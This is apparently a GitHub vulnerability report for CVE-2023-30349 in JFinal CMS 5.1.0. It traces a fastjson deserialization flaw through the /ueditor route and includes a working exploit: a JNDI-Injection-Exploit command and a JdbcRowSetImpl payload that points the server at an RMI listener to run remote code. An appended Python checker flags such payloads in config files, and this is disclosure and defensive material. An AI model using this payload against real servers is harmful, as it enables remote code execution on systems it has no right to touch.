CVE-2023-30349: jfinal CMS v5.1.0 has a command execution vulnerability · Issue #54 · jflyfox/jfinal_cms

JFinal CMS v5.1.0 was discovered to contain a remote code execution (RCE) vulnerability via the ActionEnter function.


jfinal_cms version: 5.1.0
JDK version: jdk-8u351

The ActionEnter class is instantiated in the index method of the /ueditor route.

The ConfigManager class is instantiated in the constructor of the ActionEnter class.

The constructor of ConfigManager calls initEnv().

It calls JSONObject.parseObject to parse the file content. The file content here is controllable: just replace the file content with the payload.

The file comes from WEB-INF/classes/config.json. With any file upload vulnerability in the admin backend, this file can be replaced with a file containing the payload to trigger fastjson deserialization.

Run the tool on Kali:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"

payload:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.0.110:1099/d0inxc",
        "autoCommit":true
    }
}

Replace the file content with the payload.

Visit /ueditor; the command executes and pops up the calculator.
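As an added defensive check, not code from the issue or the jfinal_cms project: a small Python audit that walks a config.json body and flags fastjson autoType markers (`@type`) and JNDI-scheme URLs, so an integrity job can catch a replaced WEB-INF/classes/config.json before the parser ever sees it. The sample configs are constructed for this example, with a placeholder host in place of a real listener.

```python
import json
import re
from typing import Any

# Schemes a JNDI lookup will follow; a data-source string pointing at one
# of these inside a static config file has no legitimate reason to be there.
JNDI_URL = re.compile(r"^(rmi|ldap|ldaps|iiop|dns)://", re.IGNORECASE)


def _walk(node: Any, path: str, findings: list[str]) -> None:
    """Recursively inspect a parsed JSON tree for fastjson autoType markers
    and JNDI-style URLs, recording a finding with its JSON path."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}" if path else key
            if key == "@type":
                findings.append(f"autoType marker at {child}: {value}")
            _walk(value, child, findings)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            _walk(item, f"{path}[{i}]", findings)
    elif isinstance(node, str) and JNDI_URL.match(node):
        findings.append(f"JNDI URL at {path}: {node}")


def audit_config(text: str) -> list[str]:
    """Return the findings for a config.json body; an empty list means clean."""
    findings: list[str] = []
    _walk(json.loads(text), "", findings)
    return findings


# Constructed samples (not taken from any deployment): a benign UEditor-style
# config, and one carrying the markers the report describes, with a
# placeholder host instead of a real RMI listener.
BENIGN_CONFIG = '{"imageActionName": "uploadimage", "imageMaxSize": 2048000}'
SUSPICIOUS_CONFIG = (
    '{"a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},'
    ' "b": {"@type": "com.sun.rowset.JdbcRowSetImpl",'
    ' "dataSourceName": "rmi://ATTACKER_HOST_PLACEHOLDER:1099/x", "autoCommit": true}}'
)

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_CONFIG), ("suspicious", SUSPICIOUS_CONFIG)):
        print(name, audit_config(body) or "clean")
```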

Related news

GHSA-8qhm-ch8h-xgjr: Remote code execution in JFinal CMS

JFinal CMS v5.1.0 was discovered to contain a remote code execution (RCE) vulnerability via the ActionEnter function.
